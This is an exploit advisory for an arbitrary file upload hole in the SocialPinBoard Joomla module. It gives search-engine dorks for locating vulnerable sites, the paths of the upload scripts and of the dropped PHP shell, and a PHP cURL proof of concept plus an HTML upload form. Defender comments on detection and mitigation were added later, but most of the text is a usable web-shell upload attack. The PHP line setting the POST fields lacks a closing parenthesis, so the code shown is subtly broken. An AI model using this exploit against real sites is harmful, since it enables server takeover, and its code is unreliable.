#################################
#Title: SocialPinBoard AFU (Arbitrary File Upload)
#Author: Con7ext
#Tested On Windows Xp And Linux Ubuntu
#Dork:
#inurl:/index.php?option=com_socialpinboard
#Powered By Socialpinboard
#index of /mod_socialpinboard_menu/
#index of /socialpinboard/
#inurl:/modules/ "Socialpinboard"
################################
Path of the vulnerable upload script (either of the two):
/modules/mod_socialpinboard_menu/saveimagefromupload.php
Or
modules/mod_socialpinboard_menu/upload-file.php
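Path of the uploaded file (shell): /modules/mod_socialpinboard_menu/images/socialpinboard/temp/RANDOMresult.php
(RANDOM appears to stand for a prefix added by the server; the page does not say how it is generated.)
For defenders: POST requests to either script above, or any .php file appearing in this temp directory, indicate that the upload has been used. The directory should hold images only and should not be configured to execute PHP.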
Exploit (PHP):
<?php
// Proof of concept from the advisory, reproduced as published: a single
// multipart POST to the module's upload script, followed by printing the
// server's reply.
//
// What the listing establishes for a defender:
//  - the request sets no cookie, header, token or credential, so the advisory
//    implies the endpoint is reachable without authentication;
//  - the file named for upload has a .php extension, so the advisory implies
//    the endpoint does not restrict uploads to image types.
// NOTE(review): the server-side script is not shown on this page; the missing
// checks are inferred from the advisory, not verified here.
//
// Mitigation and detection:
//  - remove or restrict saveimagefromupload.php and upload-file.php until the
//    module is fixed; require an authenticated session for uploads;
//  - allow-list image types by inspecting content, and store files under a
//    server-chosen name with a non-executable extension;
//  - disable script execution in the module's images/.../temp/ directory;
//  - review web logs for POSTs to these scripts and for requests to .php
//    files under that directory.

// Local file the proof of concept submits.
$uploadfile="low.php";
// Placeholder host from the advisory, followed by the upload script path.
$ch = curl_init("http://www.Con7ext-security.com/modules/mod_socialpinboard_menu/saveimagefromupload.php");
curl_setopt($ch, CURLOPT_POST, true);
// Form field name is 'uploadfile'. The leading "@" is the legacy PHP cURL
// convention for attaching the named file to the multipart body.
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('uploadfile'=>"@$uploadfile");
// Return the response body from curl_exec() instead of echoing it directly.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
// Prints whatever the server answered; the response format is not shown here.
print "$postResult";
?>
Exploit (HTML):
<!--
  Browser form equivalent of the PHP proof of concept: a multipart/form-data
  POST with one file field named "uploadfile", sent to the same upload script.
  The form contains no hidden fields, so it supplies no anti-CSRF token or
  other server-issued value with the file.
  NOTE(review): server-side handling is not shown on this page. A fixed handler
  would be expected to require an authenticated session, verify a request
  token, allow-list image content, and write to a directory where script
  execution is disabled.
-->
<html>
<body>
<form method="POST" action="http://www.Con7ext-security.com/modules/mod_socialpinboard_menu/saveimagefromupload.php" enctype="multipart/form-data">
<input type="file" name="uploadfile" /><button>Upload</button>
</form>
</body>
</html>